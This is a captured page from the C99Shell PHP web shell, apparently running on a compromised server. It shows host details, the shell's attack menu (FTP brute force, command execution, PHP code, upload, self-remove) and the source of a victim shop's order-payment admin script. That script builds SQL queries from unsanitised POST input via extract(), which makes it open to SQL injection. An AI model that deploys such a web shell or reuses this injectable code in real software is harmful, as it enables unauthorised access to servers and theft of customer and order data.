!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/home/memoriacel/public_html/2018/panel/   drwxr-xr-x
Free 985.27 GB of 1859.98 GB (52.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pedido-pagar.php (5.71 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
header
('Access-Control-Allow-Origin: *');  //para poder verlo desde shope
$pagina_actual="inicio";
$categoria_actual="inicio";
require_once(
"includes/config.php");
require_once(
"includes/funciones.php");

if (isset(
$_POST["id"])){
    
    
extract($_POSTEXTR_SKIP);

    
$result=$mysqli->query("
    UPDATE pedido_carrito SET
    estado='pago',
    datos_facturacion='"
.utf8_decode($datos_facturacion)."'
    WHERE id='"
.$id."'
    "
); 

$productos=$mysqli->query("
SELECT rpp.cantidad, rpp.precio, p.nombre, p.codigo, p.sku_individual, pp.stock, p.id, rpp.atributos, rpp.codigo_producto, p.peso
FROM renglon_pedido_producto rpp
INNER JOIN producto p ON p.id=rpp.id_producto
INNER JOIN precio_producto pp ON pp.codigo=rpp.codigo_producto
WHERE rpp.id_pedido='"
.$id."'
"
); 

$total=0;   
while (
$item=mysqli_fetch_array($productos)){
    
$total+=$item["precio"]*$item["cantidad"];  

    
//actualizo stock
    
$result=$mysqli->query("
    UPDATE precio_producto SET
    stock='"
.($item["stock"]-$item["cantidad"])."'
    WHERE codigo='"
.$item["codigo_producto"]."'
    "
);    
}   

$total_solo_productos=$total;

    
//lo mando a shope para estadisticas
    
file_get_contents($url_pedido_finalizado."&id_pedido=".$id."&total=".$total_solo_productos);

    
header('Location: administrar-pedidos.php');
}

if (isset(
$_GET["id"])){
    
$id=cadena_segura($_GET["id"],11);
    
    
$result=$mysqli->query("
    SELECT c.id, c.fecha, c.total, u.email, c.tipo_envio, c.merchant_order_id, c.encargado_proceso, c.encargado_finalizar, c.encargado_proceso_fecha, c.encargado_finalizar_fecha
    FROM pedido_carrito c
    INNER JOIN usuario_carrito u ON u.id=c.id_usuario_carrito
    WHERE c.id='
$id'
    "
);
    
$item mysqli_fetch_assoc($result);
    
    
$productos $mysqli->query("
    SELECT p.id, p.nombre, rpc.cantidad, rpc.precio, p.codigo, rpc.atributos
    FROM producto p
    INNER JOIN renglon_pedido_producto rpc ON rpc.id_producto=p.id
    WHERE rpc.id_pedido='"
.$item["id"]."'
"
);     
?>


<? if (isset($_GET["imprimir"])){?>

<head>

  <link href="http://fonts.googleapis.com/css?family=Raleway:600,800,400" rel="stylesheet" type="text/css">
    <!-- Bootstrap Core CSS -->
    <link href="bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">

    <!-- MetisMenu CSS -->
    <link href="bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">

    <!-- Custom CSS -->
    <link href="dist/css/sb-admin-2.css" rel="stylesheet">
    <link href="css/cds.css" rel="stylesheet" type="text/css">

    <!-- Custom Fonts -->
    <link href="bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">

</head>
<body>
  <img src="../contenido/logo_imprimir.jpg" alt="">
<? }?>

  <? if (!isset($_GET["imprimir"])){?>
    <div class="modal-content">
        <form method="post" action="pedido-pagar.php">
        <input type="hidden" name="id" value="<?=$id?>">
        <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal">&times;</button>
            <h4 class="modal-title">Pedido realizado desde la web</h4>
        </div>
        <div class="modal-body">
            <div class="form-group">

            <? }?>
            <meta charset="utf-8">
                <h4><b>Orden de compra #<?=$item["id"]?></b></h4>
                <p>Tipo de envio: <?=$item["tipo_envio"]?></p>
                <p>Fecha de compra: <?=ver_fecha_mysql_lindo($item["fecha"])?></p>
                <table border="1" class="table-padding-10">
                    <thead>
                      <tr><th>Código</th>
                      <th>
                        Producto
                      </th>
                      <th>
                        Cant</th>
                      <th>
                        Precio/u</th>
                      <th>
                        Total
                      </th>
                      </tr>
                    </thead>
                    <tbody>
                    <? while ($producto mysqli_fetch_assoc($productos)){?>
                      <tr>
                        <td>
                          <?=$producto["codigo"]?>
                        </td>
                        <td>
                          <?=utf8_encode($producto["nombre"]).utf8_encode($producto["atributos"])?>
                        </td>
                        <td>
                          <?=$producto["cantidad"]?>
                        </td>
                        <td>
                          <?=$producto["precio"]?>
                        </td>
                        <td>
                          <?=$producto["precio"]*$producto["cantidad"]?>
                        </td>
                      </tr>
                    <? }?>
                    </tbody>
                </table> 
                <? if (!isset($_GET["imprimir"])){?>
            </div>   

            <? if (!isset($_GET["shope"])){?> 

            <div class="form-group row">
              <div class="col-md-12">
                <h3>Pagó en local</h3>
              </div>
              <div class="col-lg-12">
                <textarea name="datos_facturacion" rows="6" class="form-control" placeholder="Datos de facturación"></textarea>
              </div>
            </div>
            <div class="form-group row">
              <div class="col-lg-12">
                <input name="submit_proceso" type="submit" class="btn btn-success" value="Pagar pedido">                
              </div>
            </div>            

            <? }?>

            
        </div>
        <div class="modal-footer">
          <a href="#" class="btn btn-" data-dismiss="modal">Cerrar</a>
        </div>
        </form>
    </div><!-- /.modal-content -->
  <? } else {?>
  <script>window.print();</script>  
  </body>
  <? }?>

<? }?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0017 ]--